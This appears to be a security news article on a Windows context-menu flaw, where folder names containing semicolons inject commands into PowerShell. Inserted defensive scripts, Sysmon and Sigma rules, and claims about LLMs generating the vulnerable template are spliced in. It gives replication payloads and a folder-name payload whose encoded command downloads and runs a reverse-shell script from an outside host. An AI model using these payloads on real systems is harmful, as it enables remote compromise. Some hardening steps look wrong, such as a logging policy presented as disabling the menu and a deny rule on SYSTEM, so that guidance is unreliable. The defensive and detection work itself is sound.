Shift + Right-Click = Game Over? 9-Year-Old Windows Command Injection Finally Exposed + Video



Introduction

A routine action as simple as holding the Shift key and right-clicking a folder to open PowerShell has been a potential zero-click gateway for silent compromise. Security researcher Rémi Gascou (Podalirius) uncovered that two built-in command injection vulnerabilities have been lurking in Windows context menus since 2017, allowing an attacker to execute arbitrary commands simply by tricking a user into opening PowerShell in a folder with a maliciously crafted name.

Learning Objectives

  • Understand how improper command sanitization in Windows Registry enables command injection via folder names.
  • Learn to detect, replicate, and mitigate the “Shift + Right-Click” PowerShell injection vulnerability.
  • Acquire practical skills for hardening Windows systems and monitoring for exploitation attempts.

You Should Know

1. Anatomy of the Injection: From Spaces to Semicolons

The core vulnerability stems from how Windows constructs the PowerShell command when a user selects “Open PowerShell window here” from the extended context menu. The command template stored in the registry is:

HKEY_CLASSES_ROOT\Directory\shell\Powershell\command
(Default) = powershell.exe -noexit -command Set-Location -literalPath "%V"

When a folder name contains a space, PowerShell misinterprets the path and breaks it into separate arguments, because the double quotes around %V do not survive powershell.exe's own parsing of the -command string. The real danger arises when the name contains a semicolon (;), which is PowerShell's statement separator. A folder named `folder; calc` turns the executed command from `Set-Location -literalPath "C:\path\to\folder"` into:

Set-Location -literalPath C:\path\to\folder; calc

PowerShell then runs Calculator after changing the directory. This is not just a proof of concept; it is a fully weaponizable vector.

Step-by-Step Guide: Replicating the Vulnerability

To see this in action (on a test system, not production):

  1. Create a new folder on your Desktop.
  2. Rename it to `test; calc.exe` (note the semicolon).
  3. Hold Shift, right-click the folder, and select “Open PowerShell window here.”
  4. Observe that PowerShell opens and Calculator launches immediately.

Other payload shapes work as well, since NTFS allows semicolons without surrounding spaces, for example `foldername;calc.exe` or `foldername(calc)`. On older Windows builds (versions before the fix) the registry entry uses single quotes instead of double quotes, so the payload has to break out of the quote first, as in `';calc;'`.
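Before deleting the menu entry, a defender usually wants to know whether such folder names already exist on a host (for example inside extracted archives under Downloads). The following audit function is an added example and is not part of the original article or the research it describes; the set of "risky" characters and the sandbox path it creates under the temp directory are my own assumptions, and it only reports what the substituted command line would look like, it never runs it.

```powershell
# Added example (not from the article): find folder names that are unsafe to
# substitute into "Set-Location -literalPath %V" once the quotes are stripped.
function Find-RiskyFolderName {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Root,
        [int]$Depth = 10
    )
    # Assumed risk set: statement separators and pipes, the single quote that
    # breaks the old '%V' template, and the sigils that start variables,
    # subexpressions and script blocks. (" is not allowed in NTFS names.)
    $riskPattern = '[;&|''`$(){}]'

    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match $riskPattern } |
        ForEach-Object {
            [pscustomobject]@{
                Path       = $_.FullName
                RiskyChars = ([regex]::Matches($_.Name, $riskPattern) | ForEach-Object Value) -join ' '
                # What explorer.exe would hand to powershell.exe for this folder.
                ResultingCommandLine = "powershell.exe -noexit -command Set-Location -literalPath `"$($_.FullName)`""
            }
        }
}

# Constructed test tree under %TEMP% (removed again at the end).
$sandbox = Join-Path ([IO.Path]::GetTempPath()) ('ctxmenu-audit-' + [guid]::NewGuid().ToString('N'))
$null = New-Item -ItemType Directory -Path $sandbox
$null = New-Item -ItemType Directory -Path (Join-Path $sandbox 'project')        # benign
$null = New-Item -ItemType Directory -Path (Join-Path $sandbox 'project; calc')  # statement separator
$null = New-Item -ItemType Directory -Path (Join-Path $sandbox "it's a trap")    # breaks the single-quoted template

# Expected: two rows ("project; calc" and "it's a trap"); "project" is not listed.
Find-RiskyFolderName -Root $sandbox | Format-Table -AutoSize

Remove-Item -LiteralPath $sandbox -Recurse -Force
```

Point the function at `$env:USERPROFILE\Downloads` or a file share to hunt for staged archives; every hit is worth a look even if the entry in the context menu has already been removed, because the same name is just as dangerous when pasted into an interactive shell.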

2. Weaponization: Turning a Folder Name into a Full-Blown Exploit

The injection is not limited to local drives. Attackers can distribute malicious ZIP files containing a project folder whose name carries the payload. When a developer extracts the archive, navigates into the folder, and uses the “Open PowerShell window here” shortcut, the code executes without any warning. The GitHub repository for this research provides multiple scenarios, including Explorer window backgrounds and shortcuts that lead users into malicious folders.

Here is a more advanced PowerShell reverse shell payload as a folder name:

folder; powershell -NoP -NonI -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAxADoAOAAwADAAMAAvAHIAZQB2AGUAcgBzAGUAcwBoAGUAbABsACcAKQ==

When the user Shift+Right-Clicks that folder and opens PowerShell, the encoded reverse shell executes, giving the attacker a foothold.

3. Hardening Windows: Removing the Threat

Security is about reducing the attack surface. The most effective mitigation is to remove the vulnerable context menu entry entirely via Group Policy or Registry.

Step-by-Step Guide: Disabling “Open PowerShell window here”

Method 1: Registry Editor (Manual)

  1. Press Win + R, type regedit, and press Enter.
  2. Navigate to `HKEY_CLASSES_ROOT\Directory\shell\Powershell`.
  3. Right-click the `Powershell` key and select Permissions.
  4. Add `SYSTEM` with Deny permissions for “Read” and “Full Control.”
  5. Do the same for `HKEY_CLASSES_ROOT\Directory\Background\shell\Powershell` to cover background clicks.

Method 2: PowerShell as Administrator (Recommended for automation)

Run the following commands to remove the keys and prevent their recreation. `HKCR:` is not a built-in PowerShell drive, so it has to be mapped first:

# HKCR: is not a built-in PowerShell drive; map it before using HKCR:\ paths
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
Remove-Item -Path "HKCR:\Directory\shell\Powershell" -Recurse -Force
Remove-Item -Path "HKCR:\Directory\Background\shell\Powershell" -Recurse -Force

Method 3: Group Policy (Enterprise environments)

Navigate to `Computer Configuration → Administrative Templates → System → Group Policy` and configure “Configure PowerShell policy logging” to disable the context menu entirely.
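The three methods above remove the entry but give no record of what was there and no way to confirm the change fleet-wide. The script below is an added example, not the article's or Microsoft's code: it reads both keys, reports whether the stored template still passes `%V` straight to `-command`, exports a `.reg` backup before deleting, and re-checks afterwards. The backup directory is an assumed location; run it elevated.

```powershell
# Added example (not from the article): audit, back up and remove the
# "Open PowerShell window here" keys, then verify. Run as Administrator.
$keys = @(
    'HKEY_CLASSES_ROOT\Directory\shell\Powershell',
    'HKEY_CLASSES_ROOT\Directory\Background\shell\Powershell'
)
$backupDir = 'C:\ProgramData\ctxmenu-backup'   # assumed path, not anything Windows defines

if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    $null = New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
}
$null = New-Item -ItemType Directory -Path $backupDir -Force

function ConvertTo-HkcrPath([string]$Key) {
    'HKCR:\' + $Key.Substring('HKEY_CLASSES_ROOT\'.Length)
}

function Get-ContextMenuState {
    foreach ($k in $keys) {
        $psPath   = ConvertTo-HkcrPath $k
        $template = $null
        if (Test-Path -LiteralPath "$psPath\command") {
            # The (default) value of the command subkey holds the launch template.
            $template = (Get-ItemProperty -LiteralPath "$psPath\command").'(default)'
        }
        [pscustomobject]@{
            Key        = $k
            Present    = Test-Path -LiteralPath $psPath
            Template   = $template
            # A template that feeds %V into -command is the pattern the article describes.
            Vulnerable = [bool]($template -and $template -match '-command\s+.*%V')
        }
    }
}

function Remove-ContextMenuEntry {
    foreach ($k in $keys) {
        $psPath = ConvertTo-HkcrPath $k
        if (-not (Test-Path -LiteralPath $psPath)) { continue }
        $file = Join-Path $backupDir (($k -replace '[\\:]', '_') + '.reg')
        # reg.exe export produces a file that "reg import" can restore if needed.
        & reg.exe export $k $file /y | Out-Null
        Remove-Item -LiteralPath $psPath -Recurse -Force
    }
}

Get-ContextMenuState | Format-Table -AutoSize   # before: Present = True, Vulnerable = True on affected builds
Remove-ContextMenuEntry
Get-ContextMenuState | Format-Table -AutoSize   # after: Present = False for both keys
```

`Get-ContextMenuState` on its own is a useful compliance check to run from your endpoint management tool: a host on which `Present` flips back to `True` has had the entry recreated, which the plain `Remove-Item` in Method 2 cannot detect.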

4. Detection and Monitoring: Blue Team Arsenal

Detecting exploitation attempts requires monitoring specific process creation events. When a user triggers the vulnerability, `explorer.exe` spawns `powershell.exe` with unusual command-line arguments containing semicolons, ampersands, or encoded payloads.

Step-by-Step Guide: Setting Up Detection

  1. Enable PowerShell Logging (Group Policy or local policy):
     • Enable “Turn on PowerShell Script Block Logging”.
     • Enable “Turn on PowerShell Module Logging”.
  2. Monitor Windows Event Logs:
     • Event ID 400: Engine state change – suspicious command strings.
     • Event ID 4104: Script block logging – look for semicolons, encoded commands, and -Enc.
  3. Deploy a Sysmon Rule to detect `explorer.exe` spawning `powershell.exe` with injection patterns. Example filter (the three conditions are wrapped in a `Rule` with `groupRelation="and"`; without it Sysmon treats each line as a separate rule and would include every process with any one of the three properties):
<Sysmon schemaversion="4.22">
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Rule groupRelation="and" name="ctxmenu_powershell_here">
        <ParentImage condition="is">C:\Windows\explorer.exe</ParentImage>
        <Image condition="end with">powershell.exe</Image>
        <CommandLine condition="contains">Set-Location -literalPath</CommandLine>
      </Rule>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>
  4. Use Sigma Rules to hunt for these patterns across your SIEM. The following Sigma rule detects suspicious PowerShell command lines containing semicolons and -literalPath (it uses the generic `process_creation` log source so the same rule maps to Sysmon Event ID 1 or Security Event ID 4688, whichever your backend provides):
title: Suspicious PowerShell Command Line via Context Menu
status: experimental
description: explorer.exe launches PowerShell through the "Open PowerShell window here" template with a statement separator in the folder path
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains: 'Set-Location -literalPath'
    CommandLine|re: '.*;.*calc.*'
  condition: selection
level: high
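To see the detection logic actually run, here is an added example (mine, not from the article or the research repository) that applies the same explorer.exe to powershell.exe check to process-creation records. It works on a few constructed records embedded in the script and, optionally, on live Sysmon Event ID 1 data; the assumptions are that Sysmon is installed with process creation logging and uses its standard `ParentImage`, `Image`, `CommandLine` and `User` field names, and that the indicator patterns below are heuristics you tune for your environment.

```powershell
# Added example (not from the article): flag context-menu PowerShell launches
# whose folder path carries injection indicators.
function Test-ContextMenuInjection {
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Record)
    process {
        # Scope: PowerShell started by Explorer through the "here" template.
        if ($Record.ParentImage -notmatch '\\explorer\.exe$')          { return }
        if ($Record.Image       -notmatch '\\(powershell|pwsh)\.exe$')  { return }
        if ($Record.CommandLine -notmatch 'Set-Location\s+-literalPath') { return }

        # Everything after -literalPath is the substituted folder path. A real
        # path never needs a statement separator, a pipe or a second command.
        $tail    = ($Record.CommandLine -split '-literalPath', 2)[1]
        $reasons = @()
        if ($tail -match '[;&|]')                                       { $reasons += 'separator or pipe in path' }
        if ($tail -match '-e(nc|ncodedcommand)?\s')                     { $reasons += 'encoded command' }
        if ($tail -match '\b(iex|invoke-expression|downloadstring|invoke-webrequest)\b') { $reasons += 'download/eval cradle' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time        = $Record.Time
                User        = $Record.User
                Reasons     = $reasons -join '; '
                CommandLine = $Record.CommandLine
            }
        }
    }
}

# Optional live source: Sysmon Event ID 1, flattened to the same shape as the
# constructed records below. (Assumes the Sysmon operational log exists.)
function Get-SysmonProcessCreate([int]$MaxEvents = 5000) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            $data = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $data['User']
                ParentImage = $data['ParentImage']
                Image       = $data['Image']
                CommandLine = $data['CommandLine']
            }
        }
}

# Constructed sample records (not real telemetry).
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sampleRecords = @(
    [pscustomobject]@{ Time = '2025-01-01 09:00'; User = 'CORP\alice'; ParentImage = 'C:\Windows\explorer.exe'; Image = $ps
                       CommandLine = 'powershell.exe -noexit -command Set-Location -literalPath "C:\Users\alice\Desktop\project"' }
    [pscustomobject]@{ Time = '2025-01-01 09:05'; User = 'CORP\alice'; ParentImage = 'C:\Windows\explorer.exe'; Image = $ps
                       CommandLine = 'powershell.exe -noexit -command Set-Location -literalPath "C:\Users\alice\Desktop\project; calc"' }
    [pscustomobject]@{ Time = '2025-01-01 09:10'; User = 'CORP\bob';   ParentImage = 'C:\Windows\explorer.exe'; Image = $ps
                       CommandLine = 'powershell.exe -noexit -command Set-Location -literalPath "C:\Users\bob\Downloads\tool; powershell -NoP -W Hidden -Enc AAAA"' }
    [pscustomobject]@{ Time = '2025-01-01 09:15'; User = 'CORP\bob';   ParentImage = 'C:\Windows\System32\cmd.exe'; Image = $ps
                       CommandLine = 'powershell.exe -noexit -command Set-Location -literalPath "C:\build; echo"' }
)

# Expected: records 2 and 3 are reported (record 3 with two reasons);
# record 1 is benign and record 4 is out of scope because cmd.exe is the parent.
$sampleRecords | Test-ContextMenuInjection | Format-List
```

Swap `$sampleRecords` for `Get-SysmonProcessCreate` to run the same logic over real events. The function deliberately looks only at the text after `-literalPath`, so a user legitimately running `Set-Location -literalPath` interactively with a semicolon elsewhere on the line does not trip it, and the `ParentImage` check keeps it scoped to the Explorer context menu the Sysmon and Sigma rules above target.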
5. AI Training Dataset Poisoning: A Silent Threat Amplifier

The SpecterOps research highlights a concerning secondary risk: these vulnerable command templates have likely been ingested into large language model (LLM) training datasets since 2017. When models like GPT-4, Claude, or Gemini are asked to generate PowerShell scripts for context menus, they reproduce the vulnerable single-quoted template without any security warnings.

Step-by-Step Guide: Testing LLMs for Vulnerable Code

  1. Prompt an LLM with: “Write a PowerShell script that creates a new context menu in Windows Explorer when a user right-clicks on a folder to open a PowerShell window here.”

2. Examine the output. Most models will generate:

powershell.exe -NoExit -Command Set-Location -LiteralPath '%V'

3. Check if the LLM includes any warning about command injection or improper quoting. In the SpecterOps study, none of the tested models did.

This finding underscores the need for security-aware AI training and careful review of AI-generated code.

What Undercode Say

  • Silent, Persistent, and Low Hanging Fruit: This vulnerability has been present for nine years, requiring no exploit delivery beyond a malicious folder name. Yet Microsoft declined to assign a CVE, raising serious questions about what is considered a security boundary.
  • Harden Don’t Pause: Since a full patch is unlikely for older systems, immediate administrative action is required: disable the context menu, enforce strict logging, and train users to avoid opening PowerShell in unfamiliar directories.
  • AI Assists but Also Amplifies Risk: LLMs are currently generating vulnerable code without warnings, making them an unwitting distribution channel for these patterns. The security community must push for safety classifiers in AI code generation.

Prediction

Attackers will integrate this technique into phishing kits and initial access brokers within months. Expect to see malicious ZIP files redistributed via public repositories and email attachments, with folder names containing obfuscated reverse shells. Microsoft’s decision not to treat this as a security boundary means enterprise defenders will bear the full burden of mitigation—making registry hardening and PowerShell logging mandatory controls rather than optional best practices.


Reported By: Shift Happens – Hackers Feeds